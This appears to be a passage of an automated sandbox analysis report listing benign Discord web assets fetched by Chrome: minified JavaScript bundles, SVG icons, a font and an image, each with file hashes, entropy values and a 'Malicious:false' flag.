                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["60673"],{292824:function(t){t.exports="/assets/00fe8a6557e204eb9503.svg"},231239:function(t,e,n){var l=n(990547),r=n(283693),i=n(570140),a=n(573261),u=n(981631);e.Z={signup:(t,e)=>a.Z.post({url:u.ANM.HUB_WAITLIST_SIGNUP,body:{email:t,school:e},trackedActionData:{event:l.NetworkActionNames.HUB_WAITLIST_SIGNUP,properties:t=>{var e;let n=!1,l=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.email_domain;return null!=l&&(n=-1!==l.split(".").indexOf("edu")),(0,r.iG)({is_edu_email:n})}},rejectWithError:!1}),sendVerificationEmail:async(t,e,n)=>(await a.Z.post({url:u.ANM.HUB_EMAIL_VERIFY_SEND,body:{email:t,guild_id:n,allow_multiple_guilds:e,use_verification_code:!0},trackedActionData:{event:l.NetworkActionNames.HUB_EMAIL_VERIFY_SEND,properties:t=>{var e;let n=null==t?void 0:null===(e=t.body)||void 0===e?void 0:e.has_matching_guild;return(0,r.iG)({has_matching_guild:n})}},rejectWithError:!1})).body,async v
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):180
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.921485085907038
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+ZacvTnARcLnkDmJS4RKb5KVErcHYWNTWi7eLFOyTIXGUNfHFQJJqGrqL0:t6AbZ/Ikn4mc4slmYWBWzLRI2ylQJAe
                                                                                                                                                                                                                                                                                    MD5:B1D4C5E276E3AAA8EC41E6014DD572B2
                                                                                                                                                                                                                                                                                    SHA1:B5B63A8B35223277D75C79B2AABD8221FDA383EB
                                                                                                                                                                                                                                                                                    SHA-256:7CF5996F7AB483BD985B3DE5BFBCF50A2B22A7B473E8011E5C993D9830AF9D12
                                                                                                                                                                                                                                                                                    SHA-512:8E4C954D96FBDA407E87FA65859FE758FC83F2DA0C6D7C07824926BFB0BCDF4F40DE057C5DD1D7EE0890C5287D2ED2EC8FDEFBDF317B46FE222339894E0A559B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/5430e9964fe8364e084d.svg
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):137
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.7861988241054
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:t6WH7W+IjSKcvUVYEo0LvDmJS4RKb5KVErcHNDPqdcJqGrqL0:t6AbzUOC3mc4slmNDiiAe
                                                                                                                                                                                                                                                                                    MD5:7D883BA72B5DBC0229F5D1980205EE34
                                                                                                                                                                                                                                                                                    SHA1:678BDA23DF97E8B9C3B15E71C41E7B215D043F22
                                                                                                                                                                                                                                                                                    SHA-256:53A0F1F10860A6E4CF9BD3B4949C5DDE68888DBC96BA0DA1020C5958EFC214A5
                                                                                                                                                                                                                                                                                    SHA-512:E040F62517C951A0AB2ABC5038F22456E5862166E2A2346345464B9C4B63271CFBD1220BB14D2C39D7FACFD008848ACE682420F1EFE9F4F29265D7177A3C7E16
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/ab03f7053698d417194c.svg
                                                                                                                                                                                                                                                                                    Preview:<svg fill="none" height="12" viewBox="0 0 12 12" width="12" xmlns="http://www.w3.org/2000/svg"><path d="m5 2h2v8h-2z" fill="#fff"/></svg>
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2058
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.614306214221163
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                                                                                                                                                                                                                                    MD5:E1349377226366F95F85AB9EAC4586D3
                                                                                                                                                                                                                                                                                    SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                                                                                                                                                                                                                                    SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                                                                                                                                                                                                                                    SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):1119213
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.87255128667712
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12288:wfm21G1c1LueOJJjm32FYYBNCgRzLzfSccT36FjYfTnjDLmn237z7v:wfm26Eujm32FbNvzLzqc1YvDLm23T
                                                                                                                                                                                                                                                                                    MD5:90185744D23C5063DC7FB2F3E6EF0ECD
                                                                                                                                                                                                                                                                                    SHA1:88786DEE688EF1EF0EC6491693B4A91CC74E58E6
                                                                                                                                                                                                                                                                                    SHA-256:054F36A6EBE7D8E5707B1098DFABB36B87D5C47C3E87E5E58922E17848205014
                                                                                                                                                                                                                                                                                    SHA-512:C3009EC868D8368706BAAD2A56E01CB9FB35F9166B8855E821286C762E5A549383E5967FB00E3BED4EA1F598CDF04BF10D46CEF6E88499000117730176466A76
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/sentry.0a75547723fa3698c125.js
                                                                                                                                                                                                                                                                                    Preview:(()=>{var e={654861:function(e,t,r){e=r.nmd(e);var n=function(e){"use strict";var t=s(9007199254740992),r="0123456789abcdefghijklmnopqrstuvwxyz",a="function"==typeof BigInt;function _(e,t,r,n){return void 0===e?_[0]:void 0!==t?10!=+t||r?x(e,t,r,n):F(e):F(e)}function o(e,t){this.value=e,this.sign=t,this.isSmall=!1}function i(e){this.value=e,this.sign=e<0,this.isSmall=!0}function E(e){this.value=e}function c(e){return -9007199254740992<e&&e<9007199254740992}function s(e){return e<1e7?[e]:e<1e14?[e%1e7,Math.floor(e/1e7)]:[e%1e7,Math.floor(e/1e7)%1e7,Math.floor(e/1e14)]}function l(e){u(e);var r=e.length;if(r<4&&0>g(e,t))switch(r){case 0:return 0;case 1:return e[0];case 2:return e[0]+1e7*e[1];default:return e[0]+(e[1]+1e7*e[2])*1e7}return e}function u(e){for(var t=e.length;0===e[--t];);e.length=t+1}function I(e){for(var t=Array(e),r=-1;++r<e;)t[r]=0;return t}function R(e){return e>0?Math.floor(e):Math.ceil(e)}function N(e,t){var r,n,a=e.length,_=t.length,o=Array(a),i=0;for(n=0;n<_;n++)i=(r=
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9343)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):9392
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496058554582109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:U3JcOTCKCo5Ui4C5qMZJcqjZEuWXRW8yVSIeUpSpWgAUcONyeHjAZ2dQUs0ne+6e:U3HblfAAr3rkRa48Ola7AsVDzotRx
                                                                                                                                                                                                                                                                                    MD5:620E3912CA81698D38461279457F47BA
                                                                                                                                                                                                                                                                                    SHA1:095AB7E19994FCD27D499156F9C9EC4C1DE8017E
                                                                                                                                                                                                                                                                                    SHA-256:CD7A4035ADE2DDE6044138275B8AAEC708F2511EAF9469FB7976B0913017B685
                                                                                                                                                                                                                                                                                    SHA-512:FFE5D97CC1D1B58AD63CD87C5DCAAA2590598E4C8BA6166B735F86C0F9E3C32F35E1794DD6FC13647345F7EABB0FE8918BE55AAB49F4084E62835606FC525CCB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/9390b4ecf309e4a58642.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["84956"],{986197:function(e,t,n){var i=n(990547),o=n(544891),r=n(570140),a=n(881052),s=n(626135),u=n(573261),l=n(545851),g=n(109488),d=n(794099),c=n(981631);n(135200);var m=n(388032);t.Z={resetSuggestions:()=>r.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1500;if(!!(0,d.vc)()){r.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t,rejectWithError:!0});if(i.ok&&(null===(n=i.body)||void 0===n?void 0:n.username)!=null)return r.Z.dispatch({type:"POMELO_REGISTRATION_SUGGESTIONS_SUCCESS",suggestion:i.body,source:e})}catch(e){return}}},async fetchSuggestions(e){if(!!(0,g.P)())try{var t;r.Z.dispatch({type:"POMELO_SUGGESTIONS_FETCH",usernameSuggestionLoading:!0});let n=await o.tn.get({url:c.ANM.POMELO_SUGG
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17618)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17667
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.611343731278581
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:eJUI8Nyx38PwalEbNhCSiYDiSqTNhAF0n:wUIE2384alhYlqNw0n
                                                                                                                                                                                                                                                                                    MD5:27DED6C70D643B2405057D268B1544BE
                                                                                                                                                                                                                                                                                    SHA1:9A0643786715F4F99E49D3715817834954A26300
                                                                                                                                                                                                                                                                                    SHA-256:4C4B922F219A8C4CA7D84F7712C8DC310EE45928E1716579372F95C9ED76C61D
                                                                                                                                                                                                                                                                                    SHA-512:922C28AAEAC286B452F989E2D2B9EE9260BA94062EE365DB6B61944BFF610CECF4CD277092E67F578865307521377B070E3EEE651F0049262A3D28F1D87EABCC
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25788"],{533307:function(e,t,n){let r;var i=n(544891),s=n(570140),l=n(728345),o=n(812206),a=n(625128),c=n(335131),d=n(669079),u=n(981631),_=n(474936);async function E(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]&&arguments[2];s.Z.dispatch({type:"GIFT_CODE_RESOLVE",code:e});try{let r=await (0,d.bT)(e,t,n);if(null!=r.application_id&&r.application_id!==_.CL){let e=o.Z.getApplication(r.application_id);if(null==e)try{await l.ZP.fetchApplication(r.application_id)}catch(e){}}if(r.application_id===u.XAJ)try{await (0,c.jr)(r.sku_id)}catch(e){}return s.Z.dispatch({type:"GIFT_CODE_RESOLVE_SUCCESS",giftCode:r}),{giftCode:r}}catch(t){throw s.Z.dispatch({type:"GIFT_CODE_RESOLVE_FAILURE",code:e,error:t}),t}}r=n(775644).Z,t.Z={resolveGiftCode:E,async fetchUserGiftCodesForSKU(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;s.Z.dispatch
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 179380, version 2.459
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):179380
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.998791638207558
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:3072:IkairG/VFWmVX/55KB+fV6ZNTJuvdeDsYaZQ9aFftKn/zfRoJC1NTuGo5m5Ss9fY:5aD/VEIXs+fVSNTJ8deoYabFftK/VosY
                                                                                                                                                                                                                                                                                    MD5:7CF1BE7696BF689B97230262EADE8AD8
                                                                                                                                                                                                                                                                                    SHA1:8EB128F9E3CF364C2FD380EEFAA6397F245A1C82
                                                                                                                                                                                                                                                                                    SHA-256:A981989AEE5D4479FFADF550D9ECFF24A4AC829483E3E55C07DA3491F84B12BA
                                                                                                                                                                                                                                                                                    SHA-512:7D7C7DC08001079D93EF447122DEE49ABD2B7A84D1619A055FF3E7EC0009261AB6ADD018560BFD82ED22B29C1915BFD059F02CD83FED2E15E9AF05A5D0654E06
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/48a594e29497835802fe.woff2
                                                                                                                                                                                                                                                                                    Preview:wOF2...............L...Q..............................F...v.`..:.....$....6.$...@...D.. ..Z...\..[lI..<....rs.J.....H.H.G..Lc6.X.......2....1...B...d5.a..1......_(.D..&v.......[...Q=..................K........w'.,yl.`.1x0.Ya..B..Ph..6m.D....kE.B`.zG4...%+..!.J......*j.z.......Z.F....~....V.m5...|Xc.eG.x}C.....[U2..:oZ..b..0j.B......9.w.....Z.:..e.t...7...6\O...5e.KUNU9.P....-W./......A.y..E.#N.........ui@.'.m..~.d.Q..vpBv.+p..9.l...Sb..s%...^2.....Z].|......=,.....@....^...5..w.6.a.2...$...[v..A..sG.t....T..L..~....H4..&#....]...W..].V.....Pt....o.Y.....T../..qS....c.O(<..-'P.9s.../.t..G .........o..b....83.^"K......J+..z^2x.L.../=Ts.....]E.....s)Y...y...g...$....da.......*lA...y..<-KoEP>..I.....T.\I..*.d75.M...0..q.F.....&......<~..k7.(.}Q.%.q.<...{..9..0>d.VV..ze...I.<..4M.s.$....k....L ..H.B....2e".3..+..]<..m..4...J.......7r....e...KT..7{:.A2..|...l..m.bS...S+.B..CQ/*.d-..;r.>.....=B.o.....!).[..2......a6.q4ak.^..kyk|.L....{.~..f1..L1..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (7679)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):7728
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.087323529198084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:96:wgSRVk6Wg8lh4Nrviiv1aWPRkDhTt9qwqSBtxCMNMRV0IBSAMD9C+m+rmxARJx3t:RSRVmriLDPRkxtRJxNMRV0IZdSL9ilfA
                                                                                                                                                                                                                                                                                    MD5:1C6B9D0AD743762986197AE0E81874C1
                                                                                                                                                                                                                                                                                    SHA1:EABACE4131BA74B108FC891EA843B4F85B218808
                                                                                                                                                                                                                                                                                    SHA-256:2D739091F602476FCF261435B48A1FAFCE2533564FFF0549D27B47E341B4DCBF
                                                                                                                                                                                                                                                                                    SHA-512:74FDE9F8997087BB107ED5DDC3A4A37BD24793CAAD605FBDCDD54E9D18AF8F44D0C0E92FB2259AA936BD1B20D5537441EF39D9A7F066323911436184B0138111
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/d67c5e680608266a1f63.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null);for(var n=0,r=this.__entries__;n<r.length;n++){var i=r[n];t.call(e,i[1],i[0])}},e}()}(),i="undefined"!
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1136
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.708059148982395
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:V7OnFlVRbrP6rwUTk4gOiQO0mlylfwyCqkl5hNnvD9YqNZmSlWWnoncHB:EnDVxrP6d1ixWwyolBnvDmqNYSlhncch
                                                                                                                                                                                                                                                                                    MD5:335EF99EF245DE6CD7A9AC9F53708CB2
                                                                                                                                                                                                                                                                                    SHA1:2B5CA0A706CC9173424B4611FB555CDD55007E12
                                                                                                                                                                                                                                                                                    SHA-256:2357B2BE4AB9C8C08069E4DBCA7252CD0FBD6A42ECCAA05740995A74BF202192
                                                                                                                                                                                                                                                                                    SHA-512:C3E302B5DB8C84A81F724EB7D8BF22241BD66C6A50BF98710939B021BF13773823542244DA8C34F2D3C90DA1978B6BDF68CA3BD08BF82ED40CBEF100B639DF4A
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:RIFFh...WEBPVP8X........?..?..ALPH.......m.!G...S.'...m.m.c[...m..nl..J.{..:... W..I..I=4j.1....zrL.i.%._.k...@....0.1'6.tH.._.-.ry...O^.K.'|eA..*!\J_...!.y.F.^.!..p.~o.L...!.(".......p. .w.d......R.!...v.}. ?J....{.....h...d..|...K..V.Q...2....._.(m..l.a..E.....y_.`..Mqg.o...%.H.....&.3.w....D..y.7...'..$.....HN[...-'2...N2....C..}7.78.m...2....E3..v.^ElL...hR.J.X.<L.....x.X.......U.5".f...6%"..W.@.&G.s..h.ND...Z......is.. .=..[.Pv..ND.6..}o.Qz.Fu......q...a.F.,..k/).na...g..kD4..o..~].G...p.C...>5.z.........N.....(r2.a...._M..)\&...M...o>.M.....v._o.u:a...w..{.....9.F..k]..~....qn@.........$K."-.R.~b.8../....l..z....bq.K#..e.:...U..[^".[.T....DD...J..KJ%.N0'..J%K^.@..8q...1...k.'....z..7..m......1....`}.Sq......~...1.............:8..Pw%X..@=.....~.T.....c.....'._c`=. ..3..6..F.O..D0.]n....&.....DD.s...LD......{.._.....q...?...^.....`."...JtX.j...S....9....b..<;.)..!..5....\........I...Iv.. '..d..."}.j...I.Q..{.......'W.U]iF........!e...5..
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):395
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.646873794844198
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                                                                                                                                                                                                                                    MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                                                                                                                                                                                                                                    SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                                                                                                                                                                                                                                    SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                                                                                                                                                                                                                                    SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/410a2166a48c9e482e2a.svg
                                                                                                                                                                                                                                                                                    Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):238
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.447904228954295
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:SM4krZurFHDZqBE8gh0S/nLLLQ/7CpTYws0VV:/4kUFHAy1J/njQGdX
                                                                                                                                                                                                                                                                                    MD5:5822280717DD3CCEEFE1400D876D4A4A
                                                                                                                                                                                                                                                                                    SHA1:0695EFDFD8D521F7F412F1B6931B709E2B37CE94
                                                                                                                                                                                                                                                                                    SHA-256:F694637EE760D283B23B2A4F7DE289E52A2C6807FDE9F2CA3E9109D4E1EF2CC4
                                                                                                                                                                                                                                                                                    SHA-512:0ABFFACAB998C4E50C2626B033FE78398B6F19259F388E40317FB3FAD44AC004CF2918A6452C528BCA8FE302D26FF33C480492151909D1B3B1801E09C3ED8CB6
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["4071"],{126436:function(p,s,a){a.r(s),s.default=JSON.parse('{"cgdAs7":"(Will open in a new tab)"}')}}]);.//# sourceMappingURL=09a6f112fcbc17f6cfd4.js.map
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (30648)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):30717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.206707568753238
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:TwGTw5tUigrB6gmkOgVZEgFSgIvAwgvS+DWGMg4kMEq1gHg0GP4CxZB1Ku0:UGc5twI4ZPMveDWGVM7P4gtKu0
                                                                                                                                                                                                                                                                                    MD5:A318DA370F7EE99D24CA9BBCE1926BAA
                                                                                                                                                                                                                                                                                    SHA1:2BF58DD3FEE18AAF9E3E8F190E985EC8D9C6232E
                                                                                                                                                                                                                                                                                    SHA-256:F22EA3781C56177B2D949FEF7F7935C1248446FCAF41D43534C6EBE94675E46E
                                                                                                                                                                                                                                                                                    SHA-512:3BD5B1906CF0F1D3108222AA64445CEF3990B7692546A22BE427A4C5EDED573E18EB32C410E2D0A25AA506DFF5383A5B444A612AAD712991E3102AA424FE912F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/8143f89919f42e84b455.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20346"],{237267:function(e,o,t){t.r(o),o.default=JSON.parse('{"14o9ZW":"Gmail","dnOc/v":"We play together to win, rank up, or beat challenges.","XE0tLS":"Join Application","axCpsL":"Anime, Roman History, Sad Hamsters, etc...","27hWtb":"Minimal","PZT7pq":"Show negative scored content","/A+uVF":"Guild Profile","jVshKi":"Servers","z4VNPz":"Missed call","ZcHHvr":"Create a badge and tag for your Guild","/W5u5u":["AutoMod quarantined ",[8,"userHook",[[8,"$b",[[1,"user"]]]]]," for violating content in their user profile"],"D0lNBA":"You\'ve been sending too many Guild applications.","QU/Rw8":"Allows members to talk in voice and hear others in this channel\'s threads.","l536p6":"Uses AutoMod","2EwC2d":"Abuse or harassment","Eorjm5":"Adjust Server/Channel Recommendations","TwueCw":"Selected","HE3oV1":"Reply","kPwMOz":"Customize your Guild\'s look","+E7Irq":"Please provide more details","nftD29":[[8,"backHook",[[
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (18413)
                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                    Size (bytes):18462
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.314671574384619
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:r0Q0mLG04pG+rx1GoKoLItuPVMWpUdq3FYbNbekaYxeWoY/Lj0WMTUbbbutFY/Gf:r0PmLGTGGDGoRstuKFNdD/ORQM
                                                                                                                                                                                                                                                                                    MD5:3C20B3592827C7BA965C3553423F6D7A
                                                                                                                                                                                                                                                                                    SHA1:900DA6D6C154A06D1605224215A9E8EA816BC2FF
                                                                                                                                                                                                                                                                                    SHA-256:899823D78F92F74C6EE1843EDA8EDC259A03F07FF8737C7DD9F076E141E8A360
                                                                                                                                                                                                                                                                                    SHA-512:22C097EBBDCB6E93A2348A82AE7B10D598F235736F55A6412C029C9A2F6077CBDA4DAAB44570701D1C647F155CCB9B70427BBD97FD860E49D3E6CD96F6F3CB55
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    URL:https://discord.com/assets/3c99eb87778b9ed038d5.js
                                                                                                                                                                                                                                                                                    Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20011"],{482682:function(t){t.exports="/assets/ebb5b41de823fbc19d12.png"},450125:function(t){t.exports="/assets/1e4932a7afbb1fcdba2d.png"},733949:function(t){t.exports="/assets/e1ce6b38901837435ec5.png"},877604:function(t,i,e){e(411104);var s,n=e(200651),h=e(192379),a=e(120356),r=e.n(a),l=e(111543);function o(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let d=t=>new Promise((i,e)=>{null==t&&e(Error("No image src passed"));let s=new Image;s.src=t,s.onload=()=>i(s),s.onerror=t=>e(t)});class u extends(s=h.PureComponent){componentDidUpdate(t){t.src!==this.props.src&&this.setState({loaded:!1},()=>this.initialize())}initialize(){d(this.props.src).then(()=>{!this.unmounting&&this.setState({loaded:!0})})}componentWillUnmount(){this.unmounting=!0}render(){let{className:t,src:i,alt:e,width:s,height:h,onLoad:a,style:o,imageClassName:d}=this.props,{lo
                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):395
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.646873794844198
                                                                                                                                                                                                                                                                                    Encrypted:false
